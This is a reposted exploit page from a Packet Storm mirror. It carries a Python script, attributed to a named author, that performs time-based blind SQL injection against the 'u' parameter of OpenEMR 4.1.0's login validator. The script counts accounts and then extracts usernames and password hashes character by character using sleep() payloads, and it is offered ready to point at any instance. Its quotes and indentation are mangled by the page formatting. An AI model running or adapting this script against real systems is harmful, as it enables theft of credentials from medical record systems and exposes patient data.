OpenEMR 4.1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 6th, 2021 📆 | 7414 Views ⚑

0

OpenEMR 4.1.0 SQL Injection ≈ Packet Storm

# Exploit Title: OpenEMR 4.1.0 – ‘u’ SQL Injection
# Date: 2021-04-03
# Exploit Author: Michael Ikua
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip
# Version: 4.1.0
# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/

#!/usr/bin/env python3

import requests
import string
import sys

print(“””
____ ________ _______ __ __ ___ ____
/ __ ____ ___ ____ / ____/ |/ / __ / // / < // __ \
/ / / / __ / _ / __ / __/ / /|_/ / /_/ / / // /_ / // / / /
/ /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ /
____/ .___/___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/
/_/
____ ___ __ _____ ____ __ _
/ __ )/ (_)___ ____/ / / ___// __ / / (_)
/ /_/ / / / __ / __ / __ / / / / / / / /
/ /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/__,_/ /____/____/_____/_/ exploit by @ikuamike
“””)

all = string.printable
# edit url to point to your openemr instance
url = “http://192.168.56.106/openemr/interface/login/validateUser.php?u=”

def extract_users_num():
print(“[+] Finding number of users…”)
for n in range(1,100):
payload = ”%2b(SELECT+if((select count(username) from users)=’ + str(n) + ‘,sleep(3),1))%2b”
r = requests.get(url+payload)
if r.elapsed.total_seconds() > 3:
user_length = n
break
print(“[+] Found number of users: ” + str(user_length))
return user_length

def extract_users():
users = extract_users_num()
print(“[+] Extracting username and password hash…”)
output = []for n in range(1,1000):
payload = ”%2b(SELECT+if(length((select+group_concat(username,’:’,password)+from+users+limit+0,1))=’ + str(n) + ‘,sleep(3),1))%2b”
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
length = n
break
for i in range(1,length+1):
for char in all:
payload = ”%2b(SELECT+if(ascii(substr((select+group_concat(username,’:’,password)+from+users+limit+0,1),’+ str(i)+’,1))=’+str(ord(char))+’,sleep(3),1))%2b”
#print(payload)
r = requests.get(url+payload)
#print(r.request.url)
if r.elapsed.total_seconds() > 3:
output.append(char)
if char == “,”:
print(“”)
continue
print(char, end=”, flush=True)

try:
extract_users()
except KeyboardInterrupt:
print(“”)
print(“[+] Exiting…”)
sys.exit()

Source link

Tagged with:



Leave a Reply